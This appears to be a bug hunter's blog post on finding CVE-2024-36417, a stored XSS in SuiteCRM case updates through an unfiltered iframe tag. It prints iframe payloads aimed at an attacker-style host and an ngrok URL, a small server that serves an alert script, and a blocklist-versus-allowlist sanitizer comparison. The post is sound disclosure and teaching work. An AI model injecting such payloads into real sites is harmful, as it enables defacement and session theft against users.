How i discovered my first CVE

1day
Jun 14, 2024

Here is a brief introduction about me before starting: I'm a 19 y/o cyber security enthusiast/learner who hunts bugs as a passion. This is a very quick article on how I discovered my first CVE. So let's get into it…

Screenshot from mitre.org

CVE-2024-36417

Mitre.org : https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36417

NVD : https://nvd.nist.gov/vuln/detail/CVE-2024-36417

POC : https://github.com/salesagility/SuiteCRM/security/advisories/GHSA-3www-6rqc-rm7j

POC (Video) : https://drive.google.com/file/d/1LhQpeMNo-xBMy7ciRt-DvG2DbP7UUW-p/view

The Discovery 🔎

I was hunting for bugs on platforms like HackerOne and Bugcrowd and found nothing for months. Then I thought, "Why don't I hunt some open-source systems?" I quickly hopped onto GitHub and searched for well-maintained CRM repositories. That is how I found SuiteCRM: it had a decent number of stars and was maintained frequently. I cloned it onto my system and started the server. Then I started clicking on every button, hyperlink and navigation item to map the web app's structure…

The Bug 🪲

After clicking through the system for about an hour I found a sweet spot: a feature where users can post "Case updates" about a specific case. If I post a "Case update" as user1, user2 can view it.

I started posting classic XSS payloads, but they were getting filtered. I tried many tags and most of them didn't work. Finally, one tag worked: the <iframe> tag got through without being filtered.

I tried posting:

<iframe src="https://test.attacker.com">

It worked. I then logged out from user1 and logged in as user2.

I went to the case page, and there I could see the iframe being rendered successfully.

Now, to demonstrate impact, I created a web server on my local machine with the following code:

const express = require('express');
const app = express();
const port = 2222;

// Every GET / serves a page whose only content is a script that pops an
// alert, so the rendered iframe shows whether content from this
// attacker-controlled origin loads inside the case update.
app.get('/', (req, res) => {
  res.send("<script>alert('You are hacked')</script>");
});

app.listen(port, () => {
  console.log(`Server started on port ${port}`);
});

Then I exposed the web server to the internet using Ngrok.

Then I crafted an iframe as follows:

<iframe src="https://test.ngrok-free.app">

and posted it as a case update as user1. I logged out from user1 and logged in as user2 (the victim).

When I visited the case updates, BOOM! The page said "You are hacked", which means the XSS successfully worked through the iframe.

Now, as an attacker, I could do a permanent page defacement using the iframe, and could also craft a cookie-stealer web page, which could lead to a potential account takeover attack.
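The classic payloads were filtered while the iframe passed, which is the usual failure mode of a tag blocklist; the following is an added example (not SuiteCRM's code) that places a hypothetical blocklist filter of that kind beside an allowlist sanitizer that escapes everything except a fixed set of attribute-free tags. The blocklist's contents and the allowed tag names are assumptions for illustration, not the project's actual filtering logic.

```javascript
// Added example, not SuiteCRM's code. The blocklist below is a
// hypothetical stand-in for a filter that catches "classic" XSS tags
// but has never heard of <iframe>.
const BLOCKED = ['script', 'img', 'svg', 'object', 'embed'];

function blocklistFilter(html) {
  // Strips opening/closing tags whose name is on the list; anything
  // not listed (iframe, form, meta, ...) passes through untouched.
  const re = new RegExp(`<\\/?(?:${BLOCKED.join('|')})\\b[^>]*>`, 'gi');
  return html.replace(re, '');
}

// Allowlist sanitizer: only these tag names survive, never with
// attributes; every other character of the input is HTML-escaped.
const ALLOWED = new Set(['b', 'i', 'u', 'p', 'br', 'ul', 'ol', 'li']);

function escapeHtml(text) {
  return text.replace(/[&<>"']/g, (c) => ({
    '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;',
  })[c]);
}

function allowlistSanitize(html) {
  // A tag token is "<", an optional "/", a tag name, then anything up
  // to the next ">" or the end of input (so an unterminated
  // "<iframe src=..." is consumed rather than leaking as text).
  const tagRe = /<(\/?)([a-zA-Z][a-zA-Z0-9]*)[^>]*>?/g;
  let out = '';
  let last = 0;
  for (const m of html.matchAll(tagRe)) {
    out += escapeHtml(html.slice(last, m.index));
    const name = m[2].toLowerCase(); // <IFRAME> is still iframe
    if (ALLOWED.has(name)) out += `<${m[1]}${name}>`; // attributes dropped
    last = m.index + m[0].length;
  }
  return out + escapeHtml(html.slice(last));
}

// Constructed input mirroring the case-update payload in the write-up.
const payload = '<iframe src="https://test.attacker.com">';
// blocklistFilter(payload) returns the iframe unchanged;
// allowlistSanitize(payload) returns ''.
```

Whatever the stored markup embeds, a script served into a cross-origin iframe executes in the framed page's own origin, so the control that matters is keeping the tag out of the stored case update rather than what the framed page does.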

Conclusion ✨

This was a quick and small article on my CVE discovery. I hope you liked it; please clap for this story if you did. Thank you 💖

Timeline 🕔

Reported on : 15/01/2024

First response : 06/02/2024

CVE published on : 10/06/2024
